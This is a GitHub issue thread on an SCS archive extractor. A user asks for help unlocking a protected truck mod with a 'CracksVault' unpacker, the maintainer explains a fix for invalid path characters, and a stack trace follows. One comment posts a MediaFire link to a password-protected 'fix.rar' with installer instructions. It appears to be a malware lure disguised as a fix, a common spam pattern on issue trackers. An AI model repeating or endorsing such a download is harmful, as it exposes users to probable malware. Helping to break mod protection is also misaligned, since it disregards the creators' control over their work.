### ISSUE TITLE
Pizzter Modding file paths

### ISSUE THREAD

**Issue by n4vi98** [sk-zk/Extractor#9]
Can someone help me unlock this mod? it have a very complicated file paths like some weird elements, when I try to extact it just causing error in the extractor like this

Unhandled exception. System.IO.IOException: The directory name is invalid. : 'C:\Users\Monch\Desktop\CracksVault_Ultimate_SCS_Unpacker_Kit_v1.1.2\CVault_Kit\Extractor\extracted\vehicle:hell\trailer_owned:hell\pmbarrett:hell\chassis:hell'

/vehicle:hell/trailer_owned:hell/pmbarrett:hell/chassis:hell/ch_53_2ax.pmd

https://server1.pizzstermodding.com/PM_Barret_Livestock_Trailer.zip
https://dbserver.pizzstermodding.com/?key=a6e4eba5-52d9-47c6-ab5a-47c462937ed2&server1

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sk-zk** [comment]
Whoops, sorry about that. Fixed in 2024-08-29. 

These paths contain characters which in Windows are invalid in filenames, which is an edge case I forgot to handle. I've changed it such that any invalid character is replaced with `_`, so your path now reads `vehicle_hell_` and so on. Any references to these paths in .sii files etc. will of course need to be updated accordingly.

**Comment by n4vi98** [comment]
now i get this error, i dont know if this is CV Vaullt issue

Unhandled exception. System.ArgumentException: The value cannot be an empty string. (Parameter 'path')
   at System.ArgumentException.ThrowNullOrEmptyException(String, String)
   at System.IO.Directory.CreateDirectory(String)
   at TruckLib.HashFs.HashFsReaderBase.ExtractToFile(IEntry, String, String)
   at TruckLib.HashFs.HashFsReaderBase.ExtractToFile(String, String)
   at Extractor.Program.<>c__DisplayClass19_1.<ExtractScs>b__0()
   at Extractor.Program.ExtractToFile(String, String, Action)
   at Extractor.Program.ExtractScs(String, String[], Boolean )
   at Extractor.Program.Extract()
   at Extractor.Program.Main(String[])
